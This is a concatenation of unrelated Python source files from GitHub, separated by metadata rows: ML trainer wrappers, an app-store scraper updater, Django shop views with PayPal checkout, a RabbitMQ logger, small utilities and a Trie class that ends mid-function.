| 2,071 |
python
|
en
|
code
| 0 |
github-code
|
6
|
11403898752
|
from torch.utils.data import Dataset
from transformers import Trainer
from transformers import TrainingArguments
from trainer.callbacks.printer import PrinterCallback
from data_manager.batch_sampler import Batch_Sampler
from model.model_parameters import Model_Parameters
from trainer.tne_config import TNE_Config
import torch
import os
import json
os.environ["WANDB_DISABLED"] = "true"
class TNETrainer():
def __init__(self, model: torch.nn.Module, train_set: Dataset, evaluation_set: Dataset, test_set: Dataset,
config: TNE_Config, hyper_parameters: Model_Parameters) -> None:
# Init Trainer properties
self.model = model
self.config = config
self.prepositions_list = config.prepositions_list
self.num_labels = config.num_labels
#################################################
# Init TNE Model #
#################################################
self.train_set = train_set
self.evaluation_set = evaluation_set
self.test_set = test_set
self.test_output_path = self.config.test_output
self.hyper_parameters = hyper_parameters
self.model = model
#################################################
# Init Training Arguments #
#################################################
training_params = hyper_parameters.training_params
evaluation_params = hyper_parameters.evaluation_params
self.training_args = TrainingArguments(output_dir=config.output_dir,
num_train_epochs=training_params["epochs"],
per_device_train_batch_size=training_params['batch_size'],
per_device_eval_batch_size=evaluation_params['batch_size'],
learning_rate=training_params['learning_rate'],
weight_decay=training_params['weight_decay'],
warmup_steps=training_params['warmup_steps'],
logging_dir=config.logs_dir,
logging_steps=5000, # log & save weights each logging_steps
evaluation_strategy="steps", # evaluate each `logging_steps`
eval_steps=evaluation_params['eval_steps'],
save_strategy="no")
#############################################
# Init Trainer #
#############################################
# Metrics
self.batch_collator = Batch_Sampler(tokenizer=self.config.tokenizer,
device_type=self.config.device)
self.trainer = Trainer(
model=self.model, # TNE model
args=self.training_args, # Training arguments, defined above
train_dataset=self.train_set, # Training set
eval_dataset=self.evaluation_set, # Evaluation set
#compute_metrics=self.metrics.compute_metrics, # Callback that computes metrics of interest
callbacks=[
# a printer callback used to draw a graph showing the
# evaluation accuracy of the model over the epochs in the training.
PrinterCallback
],
data_collator=self.batch_collator,
)
def train(self):
# train the model
self.trainer.train()
def evaluate(self):
# evaluate the model performance
self.trainer.evaluate()
def test(self):
# test the model and create a file with the predicted prepositions.
with open(self.test_output_path, 'w') as outfile:
for sample in self.test_set:
                batch = self.batch_collator(batch=[sample])
predictions = self.model(batch['input'], None)
predictions[predictions == 25] = 0
predictions_json = json.dumps({'predicted_prepositions': predictions.flatten().tolist()})
outfile.write(predictions_json + "\n")
|
ranraboh/TNE_TASK
|
trainer/tne_trainer.py
|
tne_trainer.py
|
py
| 4,430 |
python
|
en
|
code
| 0 |
github-code
|
6
|
43431205524
|
import datetime
import uuid
import logging
from concurrent.futures import ThreadPoolExecutor
from functools import partial
import pandas as pd
import sys
import pprint
import traceback
from core.scraper.scraper import Scraper
from core.db.db_helper import DbHelper
from common.constants import THREAD_NO, LARGE_CHUNK, BULK_CHUNK
from common.protobuf_to_dict.protobuf_to_dict.convertor import protobuf_to_dict
from common.app_object import App
logger = logging.getLogger(__name__)
logging.basicConfig(format='%(asctime)s %(name)-12s %(levelname)-8s %(message)s',
level=logging.INFO)
pp = pprint.PrettyPrinter(indent=4)
class Updater:
"""
Keeps iterating over the database till the script is interrupted and
collecting meta-data for apps that have previously been scraped.
"""
def __init__(self, input_file=None):
self.__db_helper = DbHelper()
self.input_file = input_file
# ***************** #
# updating all related functions
# ***************** #
def update_apps(self):
"""
Uses bulk scraping to update apps much faster than before
"""
if self.input_file is None:
# dicts representing each app and info e.g. current version code, uuid, etc.
apps = self.__db_helper.get_package_names_to_update(0)
else:
apps = pd.read_csv(self.input_file)["packageName"].tolist()
self.s = Scraper()
app_names = []
app_data = []
removed_apps = []
total_apps_no = len(apps)
logger.info("Starting bulk update with {} apps...".format(total_apps_no))
with ThreadPoolExecutor(max_workers=THREAD_NO) as executor:
res = executor.map(self.update_all_thread_worker,
range(0, total_apps_no), apps)
counter = 0
for future in res:
if future is not None:
app_names.append(future[0])
if future[1] is not None and future[2] is not None:
app_data.append((future[1], future[2]))
else:
removed_apps.append(future[0])
counter += 1
if counter % LARGE_CHUNK == 0:
logger.info("updated {} to {} out of {}".format(
counter - LARGE_CHUNK, counter, total_apps_no))
if counter % (BULK_CHUNK * 10) == 0:
logger.info("updating {} apps as removed".format(len(removed_apps)))
self.__db_helper.update_apps_as_removed(removed_apps)
removed_apps = []
try:
logger.info("inserting {} updated apps to db...".format(len(app_data)))
self.__db_helper.insert_apps_into_db(app_data)
app_data = []
except Exception as e:
logger.error("db insertion failed - {}".format(e))
print(traceback.format_exc())
logger.error(traceback.format_exc())
logger.info("completed all out of {}".format(total_apps_no))
logger.info("updating {} apps as removed".format(len(removed_apps)))
self.__db_helper.update_apps_as_removed(removed_apps)
logger.info("inserting {} updated apps to db...".format(len(app_data)))
self.__db_helper.insert_apps_into_db(app_data)
self.__db_helper.update_apps_as_not_removed(app_names)
self.__db_helper.update_date_last_scraped(app_names,
datetime.datetime.utcnow().strftime("%Y%m%dT%H%M"))
def update_all_thread_worker(self, index, app_name):
# bulk scrape to check for updates
s = self.s
"""
try:
"""
metadata = s.get_metadata_for_apps([app_name], bulk=False)
if metadata is None:
# app removed
return (app_name, None, None)
if len(list(metadata)) == 0:
return (app_name, None, None)
new_info, new_detail = list(metadata)[0]
num_updated = 0
if new_info is None:
# app is removed
logger.error("app {} has been removed".format(app_name))
return (app_name, None, None)
if new_info.packageName != app_name: # TODO why
logger.error("mismatching package names")
return
if new_info.versionCode is None or new_info.uploadDate is None:
# TODO add crawler code here to fix this, ignore for now
logger.warning("{} - null versionCode or uploadDate, ignoring".format(app_name))
return
return (app_name, new_info, new_detail)
"""
if new_info.versionCode is not None:
info_vc = new_info.versionCode
details_dict = protobuf_to_dict(new_detail)
if info_vc != details_dict["details"]["appDetails"]["versionCode"]:
logger.error("VERSION MISMATCH for {}".format(app_name))
return
# check version code to see if app is updated
updated = self.__db_helper.check_app_to_update(app_name, new_info.versionCode)
else:
# if not provided just assume is updated
updated = True
if updated:
return (app_name, new_info, new_detail)
else:
return None
"""
"""
except Exception as e:
logger.error("{} - {}".format(app_name, str(e)))
"""
"""
if __name__ == '__main__':
while True:
try:
up = Updater()
up.update_apps()
except KeyboardInterrupt:
logger.warning("Updater interrupted by user")
"""
|
CMUChimpsLab/playstore-scraper
|
core/scraper/updater.py
|
updater.py
|
py
| 5,745 |
python
|
en
|
code
| 1 |
github-code
|
6
|
2088894049
|
## \example pmi/symmetry.py
"""Clone molecules and use a symmetry constraint
"""
import IMP
import IMP.atom
import IMP.rmf
import IMP.pmi
import IMP.pmi.topology
import IMP.pmi.dof
import IMP.pmi.macros
import IMP.pmi.restraints.stereochemistry
import math
import sys
IMP.setup_from_argv(sys.argv, "Symmetry constraint example")
# Create System and State
mdl = IMP.Model()
s = IMP.pmi.topology.System(mdl)
st = s.create_state()
# Create a simple all-bead molecule
mol = st.create_molecule("mymol", sequence='A'*10, chain_id='A')
mol.add_representation(mol, resolutions=[1])
# Clone the molecule multiple times
# Calling molecule.create_clone makes a new molecule with the same name,
# sequence, initial structure, and choice of representations
# Note: another function, molecule.create_copy(), just copies the name
# and sequence
mols = [mol]
chains = 'BCDEFGHI'
for nc in range(7):
clone = mol.create_clone(chains[nc])
mols.append(clone)
hier = s.build()
# Create a symmetry constraint
# A constraint is invariant: IMP will automatically move all clones to
# match the reference
# If instead you want some more flexibility, consider
# IMP.pmi.restraints.stereochemistry.SymmetryRestraint
dof = IMP.pmi.dof.DegreesOfFreedom(mdl)
center = IMP.algebra.Vector3D([50, 0, 0])
for nc in range(7):
rot = IMP.algebra.get_rotation_about_axis([0, 0, 1], 2*math.pi*(nc+1)/8)
transform = IMP.algebra.get_rotation_about_point(center, rot)
dof.constrain_symmetry(mols[0], mols[nc+1], transform)
mdl.update() # propagates coordinates
# ########### Make stuff look cool with restraints ###########
# set up the original molecule as flexible beads
dof.create_flexible_beads(mols[0])
# Create a connectivity restraint for the first molecule
cr = IMP.pmi.restraints.stereochemistry.ConnectivityRestraint(objects=mol)
cr.add_to_model()
# Create excluded volume for all particles
evr = IMP.pmi.restraints.stereochemistry.ExcludedVolumeSphere(
included_objects=mols)
evr.add_to_model()
# Quickly move all flexible beads into place
dof.optimize_flexible_beads(100)
# write a single-frame RMF to view the helix
out = IMP.pmi.output.Output()
out.init_rmf("example_symmetry.rmf3", hierarchies=[hier])
out.write_rmf("example_symmetry.rmf3")
|
salilab/pmi
|
examples/symmetry.py
|
symmetry.py
|
py
| 2,257 |
python
|
en
|
code
| 12 |
github-code
|
6
|
16838024238
|
from typing import List
from csvcubed.models.cube import (
Cube,
QbDimension,
ExistingQbDimension,
QbColumn,
CsvColumnUriTemplateMissingError,
QbAttributeLiteral,
CsvColumnLiteralWithUriTemplate,
QbAttribute,
NoDimensionsDefinedError,
)
from csvcubed.models.validationerror import ValidationError
from csvcubed.utils.qb.cube import get_columns_of_dsd_type
from csvcubed.utils.qb.validation.observations import (
validate_observations,
)
def validate_qb_component_constraints(cube: Cube) -> List[ValidationError]:
"""
Validate a :class:`QbCube` to highlight errors in configuration.
:return: A list of :class:`ValidationError <csvcubed.models.validationerror.ValidationError>` s.
"""
errors = _validate_dimensions(cube)
errors += _validate_attributes(cube)
errors += validate_observations(cube)
return errors
def _validate_dimensions(cube: Cube) -> List[ValidationError]:
errors: List[ValidationError] = []
dimension_columns = get_columns_of_dsd_type(cube, QbDimension)
for c in cube.columns:
if isinstance(c, QbColumn) and isinstance(
c.structural_definition, ExistingQbDimension
):
if c.csv_column_uri_template is None:
errors.append(
CsvColumnUriTemplateMissingError(
c.csv_column_title, ExistingQbDimension
)
)
if len(dimension_columns) == 0:
errors.append(NoDimensionsDefinedError())
return errors
def _validate_attributes(cube: Cube) -> List[ValidationError]:
errors: List[ValidationError] = []
for c in cube.columns:
if isinstance(c, QbColumn) and isinstance(c.structural_definition, QbAttribute):
if isinstance(c.structural_definition, QbAttributeLiteral):
if c.csv_column_uri_template is not None:
errors.append(
CsvColumnLiteralWithUriTemplate(
c.csv_column_title,
f"{c.structural_definition.__class__.__name__} "
+ "cannot have a uri_tempate as it holds literal values",
)
)
else:
# Not a QbAttributeLiteral
if (
c.csv_column_uri_template is None
and len(c.structural_definition.new_attribute_values) == 0 # type: ignore
):
errors.append(
CsvColumnUriTemplateMissingError(
c.csv_column_title,
f"{c.structural_definition.__class__.__name__} using existing attribute values",
)
)
return errors
|
GDonRanasinghe/csvcubed-models-test-5
|
csvcubed/csvcubed/utils/qb/validation/cube.py
|
cube.py
|
py
| 2,817 |
python
|
en
|
code
| 0 |
github-code
|
6
|
26304099314
|
from django.conf import settings
from django.contrib import messages
from django.contrib.auth.mixins import LoginRequiredMixin
from django.core.exceptions import ObjectDoesNotExist
from django.shortcuts import get_object_or_404, redirect, render, reverse
from django.utils import timezone
from django.views import generic
from paypal.standard.forms import PayPalPaymentsForm
from django.http import HttpRequest, JsonResponse
from django.views.decorators.csrf import csrf_exempt
from .forms import CheckoutForm
from .models import ProdukItem, OrderProdukItem, Order, AlamatPengiriman, Payment
class HomeListView(generic.ListView):
template_name = 'home.html'
queryset = ProdukItem.objects.all()
paginate_by = 4
class ContactView(generic.ListView):
template_name = 'kontak.html'
queryset = ProdukItem.objects.all()
paginate_by = 4
class ProductListView(generic.ListView):
template_name = 'list_produk.html'
queryset = ProdukItem.objects.all()
paginate_by = 4
class ProductDetailView(generic.DetailView):
template_name = 'product_detail.html'
queryset = ProdukItem.objects.all()
class CheckoutView(LoginRequiredMixin, generic.FormView):
def get(self, *args, **kwargs):
form = CheckoutForm()
try:
order = Order.objects.get(user=self.request.user, ordered=False)
if order.produk_items.count() == 0:
messages.warning(self.request, 'Belum ada belajaan yang Anda pesan, lanjutkan belanja')
return redirect('toko:home-produk-list')
except ObjectDoesNotExist:
order = {}
messages.warning(self.request, 'Belum ada belajaan yang Anda pesan, lanjutkan belanja')
return redirect('toko:home-produk-list')
context = {
'form': form,
'keranjang': order,
}
template_name = 'checkout.html'
return render(self.request, template_name, context)
def post(self, *args, **kwargs):
form = CheckoutForm(self.request.POST or None)
try:
order = Order.objects.get(user=self.request.user, ordered=False)
if form.is_valid():
alamat_1 = form.cleaned_data.get('alamat_1')
alamat_2 = form.cleaned_data.get('alamat_2')
negara = form.cleaned_data.get('negara')
kode_pos = form.cleaned_data.get('kode_pos')
opsi_pembayaran = form.cleaned_data.get('opsi_pembayaran')
alamat_pengiriman = AlamatPengiriman(
user=self.request.user,
alamat_1=alamat_1,
alamat_2=alamat_2,
negara=negara,
kode_pos=kode_pos,
)
alamat_pengiriman.save()
order.alamat_pengiriman = alamat_pengiriman
order.save()
if opsi_pembayaran == 'P':
return redirect('toko:payment', payment_method='paypal')
else:
return redirect('toko:payment', payment_method='stripe')
messages.warning(self.request, 'Gagal checkout')
return redirect('toko:checkout')
except ObjectDoesNotExist:
messages.error(self.request, 'Tidak ada pesanan yang aktif')
return redirect('toko:order-summary')
class PaymentView(LoginRequiredMixin, generic.FormView):
def get(self, *args, **kwargs):
template_name = 'payment.html'
try:
order = Order.objects.get(user=self.request.user, ordered=False)
paypal_data = {
'business': settings.PAYPAL_RECEIVER_EMAIL,
                'amount': order.get_total_harga_order(),
'item_name': f'Pembayaran belajanan order: {order.id}',
'invoice': f'{order.id}-{timezone.now().timestamp()}' ,
'currency_code': 'USD',
'notify_url': self.request.build_absolute_uri(reverse('paypal-ipn')),
'return_url': self.request.build_absolute_uri(reverse('toko:paypal-return')),
'cancel_return': self.request.build_absolute_uri(reverse('toko:paypal-cancel')),
}
qPath = self.request.get_full_path()
isPaypal = 'paypal' in qPath
form = PayPalPaymentsForm(initial=paypal_data)
context = {
'paypalform': form,
'order': order,
'is_paypal': isPaypal,
}
return render(self.request, template_name, context)
except ObjectDoesNotExist:
return redirect('toko:checkout')
class OrderSummaryView(LoginRequiredMixin, generic.TemplateView):
def get(self, *args, **kwargs):
try:
order = Order.objects.get(user=self.request.user, ordered=False)
context = {
'keranjang': order
}
template_name = 'order_summary.html'
return render(self.request, template_name, context)
except ObjectDoesNotExist:
messages.error(self.request, 'Tidak ada pesanan yang aktif')
return redirect('/')
def add_to_cart(request, slug):
if request.user.is_authenticated:
produk_item = get_object_or_404(ProdukItem, slug=slug)
order_produk_item, _ = OrderProdukItem.objects.get_or_create(
produk_item=produk_item,
user=request.user,
ordered=False
)
order_query = Order.objects.filter(user=request.user, ordered=False)
if order_query.exists():
order = order_query[0]
if order.produk_items.filter(produk_item__slug=produk_item.slug).exists():
order_produk_item.quantity += 1
order_produk_item.save()
pesan = f"ProdukItem sudah diupdate menjadi: { order_produk_item.quantity }"
messages.info(request, pesan)
return redirect('toko:produk-detail', slug = slug)
else:
order.produk_items.add(order_produk_item)
messages.info(request, 'ProdukItem pilihanmu sudah ditambahkan')
return redirect('toko:produk-detail', slug = slug)
else:
tanggal_order = timezone.now()
order = Order.objects.create(user=request.user, tanggal_order=tanggal_order)
order.produk_items.add(order_produk_item)
messages.info(request, 'ProdukItem pilihanmu sudah ditambahkan')
return redirect('toko:produk-detail', slug = slug)
else:
return redirect('/accounts/login')
def remove_from_cart(request, slug):
if request.user.is_authenticated:
produk_item = get_object_or_404(ProdukItem, slug=slug)
order_query = Order.objects.filter(
user=request.user, ordered=False
)
if order_query.exists():
order = order_query[0]
if order.produk_items.filter(produk_item__slug=produk_item.slug).exists():
try:
order_produk_item = OrderProdukItem.objects.filter(
produk_item=produk_item,
user=request.user,
ordered=False
)[0]
order.produk_items.remove(order_produk_item)
order_produk_item.delete()
pesan = f"ProdukItem sudah dihapus"
messages.info(request, pesan)
return redirect('toko:produk-detail',slug = slug)
except ObjectDoesNotExist:
print('Error: order ProdukItem sudah tidak ada')
else:
messages.info(request, 'ProdukItem tidak ada')
return redirect('toko:produk-detail',slug = slug)
else:
messages.info(request, 'ProdukItem tidak ada order yang aktif')
return redirect('toko:produk-detail',slug = slug)
else:
return redirect('/accounts/login')
# @csrf_exempt
def paypal_return(request):
if request.user.is_authenticated:
try:
print('paypal return', request)
order = Order.objects.get(user=request.user, ordered=False)
payment = Payment()
payment.user=request.user
payment.amount = order.get_total_harga_order()
            payment.payment_option = 'P'  # 'P' = PayPal, 'S' = Stripe
payment.charge_id = f'{order.id}-{timezone.now()}'
payment.timestamp = timezone.now()
payment.save()
order_produk_item = OrderProdukItem.objects.filter(user=request.user,ordered=False)
order_produk_item.update(ordered=True)
order.payment = payment
order.ordered = True
order.save()
messages.info(request, 'Pembayaran sudah diterima, terima kasih')
return redirect('toko:home-produk-list')
except ObjectDoesNotExist:
messages.error(request, 'Periksa kembali pesananmu')
return redirect('toko:order-summary')
else:
return redirect('/accounts/login')
# @csrf_exempt
def paypal_cancel(request):
messages.error(request, 'Pembayaran dibatalkan')
return redirect('toko:order-summary')
def filter_products(request):
filtered_products = None
selected_kategori = request.GET.getlist('kategori')
selected_tags = request.GET.getlist('tags')
if selected_kategori or selected_tags:
filtered_products = ProdukItem.objects.all()
if selected_kategori:
filtered_products = filtered_products.filter(kategori__in=selected_kategori)
if selected_tags:
filtered_products = filtered_products.filter(label__in=selected_tags)
else:
filtered_products = ProdukItem.objects.all()
return render(request, 'list_produk.html', {'object_list': filtered_products})
def pencarian_barang(request):
keyword = request.GET.get('keyword')
if keyword:
barang = ProdukItem.objects.filter(nama_produk__icontains=keyword)
else:
barang = None
return render(request, 'list_produk.html', {'object_list': barang})
def update_quantity(request: HttpRequest):
if request.method == 'POST' and request.META.get('HTTP_X_REQUESTED_WITH') == 'XMLHttpRequest':
product_id = request.POST.get('product_id')
action = request.POST.get('action')
total = 0.0
hemat = 0.0
total_all = None
total_hemat = None
try:
product = OrderProdukItem.objects.get(id=product_id)
if action == 'increase':
product.quantity += 1
elif action == 'decrease':
if product.quantity > 1:
product.quantity -= 1
product.save()
if product.produk_item.harga_diskon:
total = product.get_total_harga_diskon_item()
hemat = product.get_total_hemat_item()
else :
total = product.get_total_harga_item()
return JsonResponse({'quantity': product.quantity, 'total':total, 'hemat':hemat})
except OrderProdukItem.DoesNotExist:
return JsonResponse({'error': 'Product not found'}, status=400)
return JsonResponse({'error': 'Invalid request'}, status=400)
def reduce_from_cart(request, slug):
if request.user.is_authenticated:
produk_item = get_object_or_404(ProdukItem, slug=slug)
order_produk_item, _ = OrderProdukItem.objects.get_or_create(
produk_item=produk_item,
user=request.user,
ordered=False
)
order_query = Order.objects.filter(user=request.user, ordered=False)
if order_query.exists():
order = order_query[0]
if order.produk_items.filter(produk_item__slug=produk_item.slug).exists():
if order_produk_item.quantity > 1 :
order_produk_item.quantity -= 1
order_produk_item.save()
pesan = f"ProdukItem sudah diupdate menjadi: { order_produk_item.quantity }"
messages.info(request, pesan)
else:
pesan = f"Produk Item tidak bisa di update"
messages.warning(request, pesan)
return redirect('toko:produk-detail', slug = slug)
else:
messages.info(request, 'ProdukItem pilihanmu tidak ada pada keranjang')
return redirect('toko:produk-detail', slug = slug)
else:
messages.info(request, 'ProdukItem pilihanmu tidak ada pada keranjang')
return redirect('toko:produk-detail', slug = slug)
else:
return redirect('/accounts/login')
def cari_produk(request, kategori):
produk = ProdukItem.objects.filter(kategori=kategori)
return render(request, 'list_produk.html', {'object_list': produk})
# def update_cart(request, slug):
# def get(self, *args, **kwargs):
# if request.user.is_authenticated:
# produk_item = get_object_or_404(ProdukItem, slug=slug)
# order_produk_item, _ = OrderProdukItem.objects.get_or_create(
# produk_item=produk_item,
# user=request.user,
# ordered=False
# )
# order_query = Order.objects.filter(user=request.user, ordered=False)
# if order_query.exists():
# order = order_query[0]
# if order.produk_items.filter(produk_item__slug=produk_item.slug).exists():
# order_produk_item.quantity += 1
# order_produk_item.save()
# order = Order.objects.get(user=self.request.user, ordered=False)
# context = {
# 'keranjang': order
# }
# template_name = 'order_summary.html'
# return render(self.request, template_name, context)
# else:
# return redirect('/accounts/login')
|
ifty123/ecomm_fix
|
ecomm/toko/views.py
|
views.py
|
py
| 14,172 |
python
|
en
|
code
| 0 |
github-code
|
6
|
71087029308
|
"""Simple wrapper for app"""
import json
from rich.console import Console
from typing import List
import requests
from src.utils import Oracles
class FlaskAppClient:
ERROR_KEY = "error"
TRACEBACK_KEY = "traceback"
def __init__(self, base_url="http://127.0.0.1:5000"):
self.base_url = base_url
self.console = Console()
def _handle_response(self, response):
try:
response_data = response.json()
except json.JSONDecodeError:
self.console.print("[red]Failed to parse server response as JSON[/red]")
self.console.print("Response from server: " + str(response))
response.raise_for_status() # This will raise an HTTPError if the HTTP request returned an unsuccessful status code.
if response.status_code == 200:
return response_data
else:
error = response_data.get(self.ERROR_KEY, 'Unknown error')
tb = response_data.get(self.TRACEBACK_KEY, None)
self.console.print(f"[red]Server error: {error}[/red]")
if tb:
self.console.print(f"[yellow]{tb}[/yellow]")
raise RuntimeError(f"Server error: {error}")
def all_results(self):
response = requests.post(f"{self.base_url}/all_results", json={})
return self._handle_response(response)
def all_scores(self, user_token):
payload = {
"token": user_token
}
response = requests.post(f"{self.base_url}/all_scores", json=payload)
return self._handle_response(response)
def score_compounds_and_update_leaderboard(self, compounds, oracle_name, user_token):
payload = {
"compounds": ",".join(compounds),
"oracle_name": oracle_name,
"token": user_token
}
response = requests.post(f"{self.base_url}/score_compounds_and_update_leaderboard", json=payload)
return self._handle_response(response)
# Usage Example:
if __name__ == "__main__":
client = FlaskAppClient()
token = "test-0"
# Example for scoring compounds
compounds = ["CC", "CCC"]
oracle_name = "DRD2"
response = client.score_compounds_and_update_leaderboard(compounds, oracle_name, token)
print(response)
# Example of error handling
compounds = ["Cxxxxx"]
oracle_name = "DRD2"
response = client.score_compounds_and_update_leaderboard(compounds, oracle_name, token)
print(response)
|
molecule-one/mlinpl-23-workshops
|
src/server_wrapper.py
|
server_wrapper.py
|
py
| 2,462 |
python
|
en
|
code
| 1 |
github-code
|
6
|
10906525746
|
import argparse
import time
import pika
from pika.exceptions import (
ChannelClosed,
ConnectionClosed,
AMQPConnectionError,
AMQPHeartbeatTimeout,
)
class Logger:
LOG_EXCHANGE = "logs"
LOG_EXCHANGE_TYPE = "topic"
def __init__(self, url, routing_keys):
connection = pika.BlockingConnection(pika.URLParameters(url))
channel = connection.channel()
channel.exchange_declare(
exchange=self.LOG_EXCHANGE,
exchange_type=self.LOG_EXCHANGE_TYPE,
durable=True,
)
# We declare a transient queue because we don't want to fill-up rabbitmq
# with logs if the logger is down
result = channel.queue_declare("", exclusive=True)
queue_name = result.method.queue
for key in routing_keys:
channel.queue_bind(exchange="logs", queue=queue_name, routing_key=key)
# Logger queue is auto ack for minimum overhead as we don't care losing some
# messages (very rare as we rarely fail)
channel.basic_consume(
queue=queue_name, on_message_callback=self.callback, auto_ack=True
)
self._channel = channel
self._connection = connection
def callback(self, ch, method, properties, body):
print("[{}] {}".format(method.routing_key, body.decode("utf-8")))
def run(self):
try:
self._channel.start_consuming()
except KeyboardInterrupt:
return True
except (
ChannelClosed,
ConnectionClosed,
AMQPConnectionError,
AMQPHeartbeatTimeout,
):
return False
finally:
if not self._connection.is_closed:
self._connection.close()
if __name__ == "__main__":
parser = argparse.ArgumentParser(
description="Display selected logs in realtime on the given broker"
)
parser.add_argument("amqp_url", help="URL of the broker, including credentials")
parser.add_argument(
"--filter",
help="Log patterns to subscribe to (default to all)",
nargs="*",
default=["#"],
)
args = parser.parse_args()
expected_stop = False
print("Ctrl-C to quit.")
print("Subcribing to logs:", args.filter)
while not expected_stop:
try:
logger = Logger(args.amqp_url, args.filter)
except AMQPConnectionError:
print("could not connect; retry…")
time.sleep(2)
continue
print("connected!")
expected_stop = logger.run()
print("bye!")
|
allo-media/eventail
|
scripts/logger.py
|
logger.py
|
py
| 2,599 |
python
|
en
|
code
| 2 |
github-code
|
6
|
29209651660
|
import os
from pathlib import Path
def correct_content(req):
with open(req, "rb") as fp:
content = fp.read()
try:
if b"\x00" in content:
raise ValueError()
content = content.decode("utf-8")
except (UnicodeDecodeError, ValueError):
content = (
content.replace(b"\xff", b"")
.replace(b"\xfe", b"")
.replace(b"\x00", b"")
.decode("utf-8")
)
with open(req, "w") as fp:
fp.write(content)
return content
def main():
root = Path("src", "tests4py", "projects", "resources")
assert root.exists() and root.is_dir(), f"Wrong cwd {Path.cwd()}"
for p in os.listdir(root):
project = root / p
default_req = project / "requirements.txt"
default_content = ""
if default_req.exists():
default_content = correct_content(default_req)
if p != "__pycache__" and project.is_dir():
reqs = dict()
for b in os.listdir(project):
bug = project / b
if bug.is_dir():
req = bug / "requirements.txt"
if req.exists():
print(req)
reqs[b] = correct_content(req)
elif default_req.exists():
reqs[b] = default_content
if len(reqs) > 0:
count = dict()
for r in reqs.values():
if r in count:
count[r] += 1
else:
count[r] = 1
r = max(count, key=count.get)
if count[r] > 1:
with open(default_req, "w") as fp:
fp.write(r)
for b in reqs:
if r == reqs[b] and (project / b / "requirements.txt").exists():
os.remove(project / b / "requirements.txt")
if __name__ == "__main__":
main()
|
smythi93/Tests4Py
|
requirements.py
|
requirements.py
|
py
| 2,015 |
python
|
en
|
code
| 8 |
github-code
|
6
|
29465067093
|
# Return the number (count) of vowels in the given string.
# We will consider a, e, i, o, u as vowels for this Kata (but not y).
# The input string will only consist of lower case letters and/or spaces.
def get_count(sentence):
# create a count variable for the vowels in the sentence
num_vowels = 0
# create a list of possible vowels
vowels = ['a', 'e', 'i', 'o', 'u']
# loop through each letter in the sentence
for char in sentence:
        # if the letter is in the vowels list, update the count variable
if char in vowels:
num_vowels += 1
# return the total variable count
return num_vowels
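# Note: the same count can also be written as a one-liner, e.g.
#     sum(1 for char in sentence if char in 'aeiou')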
# import codewars_test as test
# from solution import get_count
# @test.describe("Sample tests")
# def sample_tests():
# @test.it("Should count all vowels")
# def all_vowels():
# test.assert_equals(get_count("aeiou"), 5, f"Incorrect answer for \"aeiou\"")
# @test.it("Should not count \"y\"")
# def only_y():
# test.assert_equals(get_count("y"), 0, f"Incorrect answer for \"y\"")
# @test.it("Should return 0 when no vowels")
# def no_vowels():
# test.assert_equals(get_count("bcdfghjklmnpqrstvwxz y"), 0, f"Incorrect answer for \"bcdfghjklmnpqrstvwxz y\"")
# @test.it("Should return 0 for empty string")
# def no_vowels():
# test.assert_equals(get_count(""), 0, f"Incorrect answer for empty string")
# @test.it("Should return 5 for \"abracadabra\"")
# def test_abracadabra():
# test.assert_equals(get_count("abracadabra"), 5, f"Incorrect answer for \"abracadabra\"")
|
tuyojr/code_wars-hacker_rank-leetcode
|
code_wars/get_count.py
|
get_count.py
|
py
| 1,679 |
python
|
en
|
code
| 0 |
github-code
|
6
|
21247797774
|
import os
import pandas as pd
from sklearn.model_selection import train_test_split
import click
FILENAME_DATA = "data.csv"
FILENAME_TARGET = "target.csv"
FILENAME_TRAIN_X = "X_train.csv"
FILENAME_TRAIN_Y = "y_train.csv"
FILENAME_TEST_X = "X_test.csv"
FILENAME_TEST_Y = "y_test.csv"
@click.command("split_data")
@click.option("--input-dir")
@click.option("--output-dir")
@click.option("--size", type=float)
@click.option("--random-state", type=int)
def split_data(input_dir: str, output_dir: str, size: float, random_state: int):
path_data = os.path.join(input_dir, FILENAME_DATA)
features_df = pd.read_csv(path_data)
X_train, X_test = train_test_split(features_df, test_size=size, random_state=random_state)
path_target = os.path.join(input_dir, FILENAME_TARGET)
target_df = pd.read_csv(path_target)
y_train, y_test = train_test_split(target_df, test_size=size, random_state=random_state)
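    # Splitting features and target in two separate calls keeps rows aligned:
    # both frames have the same length and use the same test_size and
    # random_state, so train_test_split draws the identical row permutation.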
os.makedirs(output_dir, exist_ok=True)
X_train.to_csv(os.path.join(output_dir, FILENAME_TRAIN_X), index=False)
X_test.to_csv(os.path.join(output_dir, FILENAME_TEST_X), index=False)
y_train.to_csv(os.path.join(output_dir, FILENAME_TRAIN_Y), index=False)
y_test.to_csv(os.path.join(output_dir, FILENAME_TEST_Y), index=False)
if __name__ == '__main__':
split_data()
|
made-mlops-2022/alexey_sklyannyy
|
airflow_ml_dags/images/airflow-split/split_data.py
|
split_data.py
|
py
| 1,308 |
python
|
en
|
code
| 0 |
github-code
|
6
|
13092352572
|
# encoding = utf-8
class Trie(object):
def __init__(self):
"""
Initialize your data structure here.
"""
self.root = {}
self.end = -1
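        # Each trie node is a plain dict mapping a character to its child node;
        # the sentinel key self.end (-1) marks that a complete word ends there.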
def insert(self, word):
"""
Inserts a word into the trie.
:type word: str
:rtype: void
"""
curNode = self.root
for c in word:
if not c in curNode:
curNode[c] = {}
curNode = curNode[c]
curNode[self.end] = True
def search(self, word):
"""
Returns if the word is in the trie.
:type word: str
:rtype: bool
"""
curNode = self.root
for c in word:
if not c in curNode:
return False
curNode = curNode[c]
# Doesn't end here
if not self.end in curNode:
return False
return True
def startsWith(self, prefix):
"""
Returns if there is any word in the trie that starts with the given prefix.
:type prefix: str
:rtype: bool
"""
curNode = self.root
for c in prefix:
if not c in curNode:
return False
curNode = curNode[c]
return True
def get_start(self,prefix):
'''
        Given a prefix, return all matching strings stored in the trie.
:param prefix:
:return:
'''
def get_key(pre,pre_node):
result = []
if pre_node.get(self.end):
result.append(pre)
for key in pre_node.keys():
if key != self.end:
result.extend(get_key(pre+key,pre_node.get(key)))
return result
if not self.startsWith(prefix):
return []
else:
node = self.root
for p in prefix:
node = node.get(p)
else:
return get_key(prefix,node)
@staticmethod
def levenshtein_dp(s: str, t: str) -> int:
'''
        Compute the Levenshtein distance; the smaller the distance, the more similar the two words.
:param s:
:param t:
:return:
'''
m, n = len(s), len(t)
table = [[0] * (n + 1) for _ in range(m + 1)]
table[0] = [j for j in range(n + 1)]
# print(table)
for i in range(m + 1):
table[i][0] = i
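        # DP recurrence: table[i][j] holds the edit distance between s[:i] and
        # t[:j] and is the minimum of a deletion (table[i-1][j] + 1), an
        # insertion (table[i][j-1] + 1) and a substitution/match
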